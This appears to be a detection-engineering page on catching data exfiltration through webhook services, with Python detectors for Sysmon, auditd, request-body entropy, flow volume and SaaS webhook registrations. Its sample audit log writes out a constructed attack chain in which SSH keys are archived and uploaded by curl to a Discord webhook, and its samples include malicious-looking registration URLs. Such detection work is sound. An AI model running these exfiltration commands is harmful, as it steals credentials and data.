Script hosts and other living-off-the-land binaries (e.g., powershell.exe, wscript.exe, mshta.exe) sending data to webhook endpoints (Discord, Slack, webhook.site) with HTTP POST or PUT requests. Defender perspective: a suspicious process lineage (for example an Office application or mail client spawning a script host) followed shortly by an outbound HTTPS connection from that process to a webhook domain. The connection on its own is low signal, since it is TLS to a well-known SaaS host; the detection value comes from joining it to the creating process and its parent.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Access (DC0055) | WinEventLog:Security | EventCode=4663 (requires a SACL on the monitored files) |

| Field | Description |
|---|---|
| WebhookDomains | Hosts to monitor, such as discord.com (path /api/webhooks/), hooks.slack.com (path /services/), slack.com (path /api/), webhook.site. Sysmon EventCode=3 exposes only the destination hostname, so match on that; paths are visible only to a proxy or TLS-inspecting sensor. |
| UploadSizeThreshold | Threshold for abnormal data volume sent in webhook requests. Sysmon does not record bytes sent, so apply this to proxy or NSM flow logs. |
| ApprovedApps | List of approved business apps using webhooks to reduce noise. |
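The join described above, as an added example that is not part of this page: Sysmon EventCode=1 and EventCode=3 records are correlated on ProcessGuid, and a connection to a WebhookDomains host is raised when the image is a script host or its parent is one of the suspicious parents, unless the image is in ApprovedApps. The script hosts, suspicious parents, allow-listed path and the sample events are all constructed for the example.

```python
"""Join Sysmon process creation (EventCode 1) with network connections
(EventCode 3) to flag script hosts that reach webhook domains.
The events below are constructed for this example."""
from datetime import datetime
from ntpath import basename  # handles Windows paths on any OS

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Parents that should rarely spawn a script host which then talks to a webhook.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wmiprvse.exe"}
# WebhookDomains: Sysmon records only the destination hostname, not the URL path.
WEBHOOK_DOMAINS = ("discord.com", "discordapp.com", "hooks.slack.com",
                   "slack.com", "webhook.site")
# ApprovedApps: hypothetical allow-list of full image paths, lower-cased.
APPROVED_APPS = {r"c:\program files\buildagent\notify.exe"}


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def is_webhook_host(hostname):
    h = (hostname or "").lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in WEBHOOK_DOMAINS)


def correlate(events):
    """events: Sysmon records as dicts. EC1 carries ProcessGuid, Image, ParentImage;
    EC3 carries ProcessGuid, Image, DestinationHostname, DestinationPort, Initiated.
    Returns one alert per suspicious outbound connection."""
    created = {}  # ProcessGuid -> EC1 record (the GUID is unique per process instance)
    alerts = []
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        if ev["EventCode"] == 1:
            created[ev["ProcessGuid"]] = ev
            continue
        if ev["EventCode"] != 3 or ev.get("Initiated", "true") != "true":
            continue  # only connections this host initiated matter here
        if not is_webhook_host(ev.get("DestinationHostname")):
            continue
        image = ev["Image"].lower()
        if image in APPROVED_APPS:
            continue
        start = created.get(ev["ProcessGuid"])
        parent = basename(start["ParentImage"]).lower() if start else None
        script_host = basename(image) in SCRIPT_HOSTS
        bad_parent = parent in SUSPICIOUS_PARENTS
        if not (script_host or bad_parent):
            continue  # e.g. a browser started by explorer.exe visiting Discord
        age = (parse_time(ev["UtcTime"]) - parse_time(start["UtcTime"])).total_seconds() if start else None
        alerts.append({
            "time": ev["UtcTime"], "image": basename(image), "parent": parent,
            "dest": ev["DestinationHostname"], "port": ev.get("DestinationPort"),
            "seconds_after_start": age,
            "severity": "high" if script_host and bad_parent else "medium",
        })
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NOTIFY = r"C:\Program Files\BuildAgent\notify.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [  # constructed; GUIDs shortened for readability
    {"EventCode": 1, "UtcTime": "2024-05-01 12:00:00.000", "ProcessGuid": "{G1}", "Image": PS,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventCode": 3, "UtcTime": "2024-05-01 12:00:07.500", "ProcessGuid": "{G1}", "Image": PS,
     "DestinationHostname": "discord.com", "DestinationPort": 443, "Initiated": "true"},
    {"EventCode": 3, "UtcTime": "2024-05-01 12:00:09.000", "ProcessGuid": "{G1}", "Image": PS,
     "DestinationHostname": "www.microsoft.com", "DestinationPort": 443, "Initiated": "true"},
    {"EventCode": 1, "UtcTime": "2024-05-01 12:01:00.000", "ProcessGuid": "{G2}", "Image": NOTIFY,
     "ParentImage": r"C:\Program Files\BuildAgent\agent.exe"},
    {"EventCode": 3, "UtcTime": "2024-05-01 12:01:01.000", "ProcessGuid": "{G2}", "Image": NOTIFY,
     "DestinationHostname": "hooks.slack.com", "DestinationPort": 443, "Initiated": "true"},
    {"EventCode": 1, "UtcTime": "2024-05-01 12:02:00.000", "ProcessGuid": "{G3}", "Image": CHROME,
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventCode": 3, "UtcTime": "2024-05-01 12:02:03.000", "ProcessGuid": "{G3}", "Image": CHROME,
     "DestinationHostname": "discord.com", "DestinationPort": 443, "Initiated": "true"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Only the Word-spawned PowerShell connection is raised; the allow-listed build agent and the user's browser are dropped even though both reach webhook hosts.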
Command-line tools such as curl or wget, or custom scripts, issuing POST requests to webhook endpoints with encoded or bulk data (a file upload, a base64 blob inside the JSON body). Defender perspective: abnormal chaining of sensitive file access or compression (tar, gzip, zip) followed, within a short window and under the same login user, by outbound data to webhook URLs.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:EXECVE | curl -X POST, -d or -F; wget --post-data or --post-file |
| File Access (DC0055) | auditd:SYSCALL | read/open of sensitive files (requires audit watch rules on those paths) |
| Network Traffic Content (DC0085) | NSM:Flow | large HTTPS POST requests to webhook endpoints |

| Field | Description |
|---|---|
| AllowedTools | Expected command-line utilities allowed to interact with webhooks in enterprise environments. |
| TimeWindow | Expected timeframe for legitimate webhook traffic (e.g., CI/CD deployments), and the maximum gap between a file access or compression and the webhook POST for the two to be treated as one chain. |
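The auditd side of this analytic, as an added example rather than the page's own code: EXECVE records are decoded (auditd hex-encodes arguments that contain spaces or quotes), paired with their SYSCALL record by audit serial, and a curl or wget POST to a webhook URL is flagged with whether it carried a file upload or an encoded blob and whether the same auid ran an archiver within TimeWindow. The AllowedTools path, the archiver list and the audit log itself are constructed for the example.

```python
"""Rebuild argv from auditd EXECVE records, pair each with its SYSCALL record
by serial, and flag POSTs of bulk or encoded data to webhook URLs, noting
when the same login user ran an archiver shortly before.
The audit log below is constructed for this example."""
import os
import re
from collections import defaultdict

WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)*(?:discord(?:app)?\.com/api/webhooks|"
    r"hooks\.slack\.com/services|webhook\.site)/", re.I)
ARCHIVERS = {"tar", "gzip", "zip", "7z", "xz", "zstd"}
ALLOWED_TOOLS = {"/usr/local/bin/ci-notify"}  # AllowedTools; hypothetical path
TIME_WINDOW = 300.0                            # TimeWindow, seconds
ENCODED_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")  # long base64-looking run
HEADER_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):\s*(.*)$")
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_line(line):
    m = HEADER_RE.match(line.strip())
    if not m:
        return None
    rtype, ts, serial, rest = m.groups()
    return rtype, float(ts), serial, dict(FIELD_RE.findall(rest))


def decode_value(raw):
    # auditd quotes plain values; a value containing whitespace, quotes or
    # non-printable bytes is written unquoted as upper-case hex.
    if raw.startswith('"'):
        return raw[1:-1]
    if re.fullmatch(r"(?:[0-9A-F]{2})+", raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def execve_argv(fields):
    # Simplification: arguments auditd splits into a4[0], a4[1], ... are not reassembled.
    return [decode_value(fields["a%d" % i]) for i in range(int(fields["argc"])) if "a%d" % i in fields]


def post_details(argv):
    """(is_post, data_args) for curl/wget; file uploads are reported as '@path'."""
    tool, is_post, data = os.path.basename(argv[0]), False, []
    if tool == "curl":
        for i, a in enumerate(argv):
            nxt = argv[i + 1] if i + 1 < len(argv) else ""
            if a in ("-d", "--data", "--data-binary", "--data-raw", "--data-urlencode", "-F", "--form"):
                is_post, data = True, data + [nxt]
            elif a in ("-T", "--upload-file"):
                is_post, data = True, data + ["@" + nxt]
            elif a.upper() in ("-XPOST", "-XPUT") or (a == "-X" and nxt.upper() in ("POST", "PUT")):
                is_post = True
    elif tool == "wget":
        for i, a in enumerate(argv):
            if a.startswith(("--post-data", "--post-file", "--body-data", "--body-file")):
                is_post = True
                flag, _, val = a.partition("=")
                val = val if "=" in a else (argv[i + 1] if i + 1 < len(argv) else "")
                data.append("@" + val if flag.endswith("file") else val)
    return is_post, data


def detect(lines):
    recs, order = defaultdict(dict), []
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            rtype, ts, serial, fields = parsed
            if serial not in recs:
                order.append(serial)
            recs[serial][rtype], recs[serial]["ts"] = fields, ts
    last_archive, alerts = {}, []  # auid -> (ts, tool)
    for serial in order:
        rec = recs[serial]
        if "EXECVE" not in rec or "SYSCALL" not in rec:
            continue
        argv, sc, ts = execve_argv(rec["EXECVE"]), rec["SYSCALL"], rec["ts"]
        auid, exe = sc.get("auid"), decode_value(sc.get("exe", ""))
        if argv and os.path.basename(argv[0]) in ARCHIVERS:
            last_archive[auid] = (ts, os.path.basename(argv[0]))
            continue
        urls = [a for a in argv if WEBHOOK_RE.search(a)]
        if not urls or exe in ALLOWED_TOOLS:
            continue
        is_post, data = post_details(argv)
        prior = last_archive.get(auid)
        alerts.append({
            "serial": serial, "auid": auid, "pid": sc.get("pid"), "exe": exe, "url": urls[0],
            "post": is_post,
            "bulk": any(a.startswith("@") or "=@" in a for a in data),
            "encoded": any(ENCODED_RE.search(a) for a in data),
            "chained_with": prior[1] if prior and ts - prior[0] <= TIME_WINDOW else None,
        })
    return alerts


def _hex(s):  # mimic auditd's hex encoding of an argument that contains spaces/quotes
    return s.encode().hex().upper()

PAYLOAD_HEX = _hex('payload_json={"content": "' + "QUFB" * 30 + '"}')
SAMPLE_LOG = """
type=SYSCALL msg=audit(1714564800.101:2001): arch=c000003e syscall=59 success=yes exit=0 ppid=4100 pid=4101 auid=1000 uid=1000 comm="tar" exe="/usr/bin/tar" key="exec"
type=EXECVE msg=audit(1714564800.101:2001): argc=4 a0="tar" a1="czf" a2="/tmp/.s.tgz" a3="/home/alice/.ssh"
type=SYSCALL msg=audit(1714564800.155:2002): arch=c000003e syscall=59 success=yes exit=0 ppid=4100 pid=4102 auid=1000 uid=1000 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1714564800.155:2002): argc=7 a0="curl" a1="-s" a2="-F" a3="file=@/tmp/.s.tgz" a4="-F" a5=%s a6="https://discord.com/api/webhooks/1234/abcd"
type=SYSCALL msg=audit(1714564900.010:2003): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=4200 auid=1001 uid=1001 comm="ci-notify" exe="/usr/local/bin/ci-notify" key="exec"
type=EXECVE msg=audit(1714564900.010:2003): argc=3 a0="ci-notify" a1="--url" a2="https://hooks.slack.com/services/T000/B000/XXXX"
type=SYSCALL msg=audit(1714565000.200:2004): arch=c000003e syscall=59 success=yes exit=0 ppid=4100 pid=4300 auid=1000 uid=1000 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1714565000.200:2004): argc=2 a0="curl" a1="https://api.github.com/repos/acme/app"
""".strip() % PAYLOAD_HEX

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Only serial 2002 is raised: a multipart upload of the archive tar created 54 ms earlier, with a base64-looking blob in the form field. The allow-listed ci-notify call and the plain curl GET are ignored.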
Unexpected apps or scripts (osascript, curl, Automator workflows) exfiltrating data via webhooks. Defender perspective: correlation of clipboard or file read operations followed by HTTPS POST traffic to webhook services.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | execution of osascript, curl, or unexpected automation |
| File Access (DC0055) | macos:unifiedlog | file read of sensitive directories |
| Network Traffic Flow (DC0078) | macos:unifiedlog | outbound connections to known webhook hosts (the unified log records the connection, not the HTTP method or body; a proxy or TLS-terminating sensor is needed for those) |

| Field | Description |
|---|---|
| WebhookEndpoints | Webhook URLs monitored for exfiltration. |
| EntropyThreshold | Shannon entropy (bits per byte) above which a request body is treated as encoded or encrypted. Plain English text sits near 4 to 4.5 bits per byte, base64 approaches its ceiling of 6, and compressed or encrypted data approaches 8. |
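The EntropyThreshold check, as an added example that is not from this page: Shannon entropy is computed over the whole request body and separately over its longest base64-looking run, so a small JSON wrapper around an encoded blob does not drag the score down. The threshold of 5.5 bits per byte, the minimum length and the three sample bodies are constructed for the example; the bodies themselves would come from a proxy or TLS-terminating sensor, not from the unified log.

```python
"""Shannon entropy as an EntropyThreshold signal on a webhook request body.
Bodies are constructed inline; capturing the body needs a proxy or
TLS-terminating sensor, because the unified log only records the connection."""
import base64
import math
import random
import re
from collections import Counter

ENTROPY_THRESHOLD = 5.5   # bits per byte, between English (~4.5) and base64 (~6.0)
MIN_LENGTH = 256          # below this the estimate is too noisy to act on
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")


def shannon_entropy(data):
    """Empirical entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_body(body, threshold=ENTROPY_THRESHOLD):
    """Score the whole body and its longest base64-looking run separately."""
    h = shannon_entropy(body)
    runs = B64_RUN.findall(body)
    blob = max(runs, key=len) if runs else b""
    blob_h = shannon_entropy(blob)
    if len(body) >= MIN_LENGTH and h > 6.5:
        verdict = "binary"        # well above the 6.0 base64 ceiling: compressed or encrypted
    elif len(blob) >= MIN_LENGTH and blob_h >= threshold:
        verdict = "encoded"       # a base64 run with near-uniform symbol use
    elif len(body) >= MIN_LENGTH and h >= threshold:
        verdict = "high-entropy"
    else:
        verdict = "plain"
    return {"length": len(body), "entropy": round(h, 3),
            "blob_length": len(blob), "blob_entropy": round(blob_h, 3), "verdict": verdict}


# Constructed sample bodies: a CI notification, a base64-wrapped file, raw ciphertext-like bytes.
_rng = random.Random(2024)
_random_bytes = bytes(_rng.getrandbits(8) for _ in range(1500))
SAMPLE_BODIES = {
    "ci_notification": (b'{"content": "Nightly build 4821 finished on main: 312 tests passed, '
                        b'0 failed, 4 skipped. Artifacts were uploaded to the release bucket; '
                        b'see the pipeline page for timing details and the changelog for what '
                        b'shipped. Next scheduled run is tomorrow at 02:00 UTC unless paused."}'),
    "base64_in_json": b'{"content": "' + base64.b64encode(_random_bytes) + b'"}',
    "raw_binary": _random_bytes + bytes(_rng.getrandbits(8) for _ in range(500)),
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, classify_body(body))
```

The JSON-wrapped base64 body scores just under 6.0 on its blob and is reported as encoded, the raw bytes score near 8.0 and are reported as binary, and the notification stays well below the threshold. Bodies shorter than MIN_LENGTH are never escalated, since a few dozen bytes cannot support the estimate.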
VMware services or management daemons generating HTTP POST requests to webhook endpoints, chained with unusual datastore or log access. Defender perspective: exfiltration of VM logs or disk images (VMDK, VMX and vmware.log files) over webhook URLs.

| Data Component | Name | Channel |
|---|---|---|
| File Access (DC0055) | esxi:hostd | datastore file access (datastore browser operations, file copy or download) |
| Network Traffic Content (DC0085) | esxi:vmkernel | outbound connections to webhook endpoints (the HTTP method and byte counts come from a network sensor, not from the host logs) |

| Field | Description |
|---|---|
| DatastoreExfilThreshold | Minimum data volume, within a time window, to flag exfiltration attempts from VM files. |
| ApprovedIntegrations | Allow-listed CI/CD or automation webhooks tied to vSphere/ESXi. |
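The volume thresholds on this page (UploadSizeThreshold for Windows, the large-POST NSM:Flow row for Linux, and DatastoreExfilThreshold here) all need byte counts that host logs do not carry, so one added example serves all three: a sliding window over network flow records keeps a running total of client-sent bytes per (source host, webhook host) and raises once when the total crosses the threshold. This is not code from the page; the 100 MiB threshold, the one-hour window, the approved integration pair and the Zeek-like flow records (conn.log orig_bytes joined with the ssl.log server_name) are constructed for the example.

```python
"""Sliding-window byte totals per (source host, webhook host) over flow
records, to apply a volume threshold such as UploadSizeThreshold or
DatastoreExfilThreshold. Flow records below are constructed in a Zeek-like
shape (conn.log orig_bytes joined with the ssl.log server_name)."""
from collections import defaultdict, deque

MiB = 1024 * 1024
WEBHOOK_DOMAINS = ("discord.com", "discordapp.com", "hooks.slack.com", "webhook.site")
THRESHOLD_BYTES = 100 * MiB     # volume within the window that triggers an alert
WINDOW_SECONDS = 3600
# ApprovedIntegrations: hypothetical (source host, webhook host) pairs.
APPROVED = {("10.0.0.12", "hooks.slack.com")}


def is_webhook_host(name):
    h = (name or "").lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in WEBHOOK_DOMAINS)


class VolumeTracker:
    """Per (src, host): the flows seen in the last window and their running byte
    total. Alerts once per key when the total crosses the threshold."""

    def __init__(self, threshold=THRESHOLD_BYTES, window=WINDOW_SECONDS):
        self.threshold, self.window = threshold, window
        self.flows = defaultdict(deque)   # key -> deque of (ts, orig_bytes)
        self.totals = defaultdict(int)
        self.alerted = set()

    def observe(self, flow):
        host = (flow.get("server_name") or "").lower()
        if not is_webhook_host(host):
            return None
        key = (flow["id.orig_h"], host)
        if key in APPROVED:
            return None
        q, ts, sent = self.flows[key], flow["ts"], flow["orig_bytes"]
        q.append((ts, sent))
        self.totals[key] += sent
        while q and ts - q[0][0] > self.window:   # evict flows older than the window
            self.totals[key] -= q.popleft()[1]
        if self.totals[key] >= self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return {"src": key[0], "webhook_host": host, "bytes_in_window": self.totals[key],
                    "flows_in_window": len(q), "last_ts": ts}
        return None


def run(flows):
    tracker, alerts = VolumeTracker(), []
    for flow in sorted(flows, key=lambda f: f["ts"]):
        alert = tracker.observe(flow)
        if alert:
            alerts.append(alert)
    return alerts


def _flow(ts, src, host, sent):
    return {"ts": ts, "id.orig_h": src, "id.resp_p": 443, "server_name": host, "orig_bytes": sent}

SAMPLE_FLOWS = [  # constructed
    _flow(96000, "10.0.0.11", "discord.com", 60 * MiB),       # too old to count once the burst starts
    _flow(100000, "10.0.0.11", "discord.com", 45 * MiB),
    _flow(100600, "10.0.0.11", "discord.com", 45 * MiB),      # running total 90 MiB: below threshold
    _flow(101200, "10.0.0.11", "discord.com", 45 * MiB),      # 135 MiB within the hour: alert
    _flow(100300, "10.0.0.12", "hooks.slack.com", 200 * MiB),  # approved integration
    _flow(100400, "10.0.0.13", "discord.com", 2048),          # a normal notification
    _flow(100500, "10.0.0.11", "www.example.com", 500 * MiB),  # not a webhook host
]

if __name__ == "__main__":
    for alert in run(SAMPLE_FLOWS):
        print(alert)
```

The 60 MiB flow at ts 96000 is evicted when the 100000 flow arrives, so the total restarts at 45 MiB and the alert fires on the third 45 MiB upload, not the second. Eviction runs before the threshold check so that stale bytes never contribute to an alert.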
Suspicious SaaS tenant activity involving webhook configurations pointing to external or untrusted domains. Defender perspective: suspicious webhook endpoint registrations (new endpoints on domains the enterprise does not own, public webhook receivers, IP literals) or repeated automated exports through them.

| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | Set-Mailbox, Add-InboxRule, RegisterWebhook |
| Network Traffic Flow (DC0078) | saas:api | Webhook registrations or repeated POST activity |

| Field | Description |
|---|---|
| WebhookRegistrations | Monitor new webhook creation events in SaaS environments, including bursts of registrations by a single user. |
| ExternalDomains | Flag webhooks pointing to domains not owned by the enterprise. Compare the parsed hostname rather than the raw string, so that look-alike domains, userinfo before an @ and punycode labels are not mistaken for enterprise hosts. |
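The WebhookRegistrations and ExternalDomains checks, as an added example rather than the page's own code: each registration's target URL is parsed, its real hostname is compared against enterprise-owned zones with a dot-boundary suffix match, and look-alike domains, userinfo tricks, IP literals, punycode labels, non-standard ports and public webhook receivers are reported as reasons; a per-user count over a short window flags bursts of registrations. The enterprise zone, the burst parameters and the audit records (including the RegisterWebhook operation name and the target URLs) are constructed for the example.

```python
"""Classify webhook registration targets from SaaS audit records and note
bursts of registrations by one user. Records below are constructed."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

ENTERPRISE_DOMAINS = {"example.com"}            # hypothetical enterprise-owned zones
PUBLIC_RECEIVERS = ("webhook.site", "discord.com", "hooks.slack.com")  # from WebhookDomains
BURST_COUNT, BURST_WINDOW = 3, 600              # registrations per user per 10 minutes


def host_in(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_endpoint(url):
    """Return (verdict, reasons) for one webhook URL."""
    reasons = []
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").rstrip(".")   # lower-cased, userinfo and brackets removed
        port = parts.port
    except ValueError:
        return "invalid", ["unparseable URL"]
    if parts.scheme not in ("http", "https") or not host:
        return "invalid", ["missing scheme or host"]
    if parts.scheme == "http":
        reasons.append("cleartext http")
    if parts.username is not None:
        reasons.append("userinfo before @ (real host is %s)" % host)
    try:
        ipaddress.ip_address(host)
        is_ip = True
        reasons.append("IP literal host")
    except ValueError:
        is_ip = False
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label")
    if port not in (None, 80, 443):
        reasons.append("non-standard port %d" % port)
    if host_in(host, PUBLIC_RECEIVERS):
        reasons.append("public webhook receiver")
    if not is_ip and host_in(host, ENTERPRISE_DOMAINS):
        return ("review" if reasons else "internal"), reasons
    reasons.append("host %s is not enterprise-owned" % host)
    return "external", reasons


def review_registrations(records):
    """records: dicts with ts, UserId, Operation, TargetUrl."""
    recent, out = defaultdict(list), []
    for r in sorted(records, key=lambda r: r["ts"]):
        verdict, reasons = classify_endpoint(r["TargetUrl"])
        times = recent[r["UserId"]]
        times.append(r["ts"])
        while times and r["ts"] - times[0] > BURST_WINDOW:
            times.pop(0)
        if len(times) >= BURST_COUNT:
            reasons.append("%d registrations by %s within %ds" % (len(times), r["UserId"], BURST_WINDOW))
        out.append({"ts": r["ts"], "user": r["UserId"], "url": r["TargetUrl"],
                    "verdict": verdict, "reasons": reasons})
    return out


SAMPLE_RECORDS = [  # constructed; 203.0.113.0/24 is a documentation range
    {"ts": 0, "UserId": "alice@example.com", "Operation": "RegisterWebhook", "TargetUrl": "https://hooks.example.com/erp"},
    {"ts": 10, "UserId": "bob@example.com", "Operation": "RegisterWebhook", "TargetUrl": "https://example.com.evil-collector.net/collect"},
    {"ts": 20, "UserId": "bob@example.com", "Operation": "RegisterWebhook", "TargetUrl": "https://example.com@webhook.site/9f1c"},
    {"ts": 30, "UserId": "bob@example.com", "Operation": "RegisterWebhook", "TargetUrl": "https://203.0.113.5:8443/hook"},
    {"ts": 40, "UserId": "bob@example.com", "Operation": "RegisterWebhook", "TargetUrl": "https://xn--80ak6aa92e.com/hook"},
    {"ts": 3600, "UserId": "carol@example.com", "Operation": "RegisterWebhook", "TargetUrl": "http://intranet.example.com/hook"},
]

if __name__ == "__main__":
    for row in review_registrations(SAMPLE_RECORDS):
        print(row["verdict"], row["url"], row["reasons"])
```

The userinfo case is the one a naive substring match on "example.com" gets wrong: urlsplit reports the host as webhook.site and the enterprise name as the username, so the registration is external. Carol's cleartext endpoint on an enterprise host is returned as "review" rather than "external", since the host is owned but the transport is wrong.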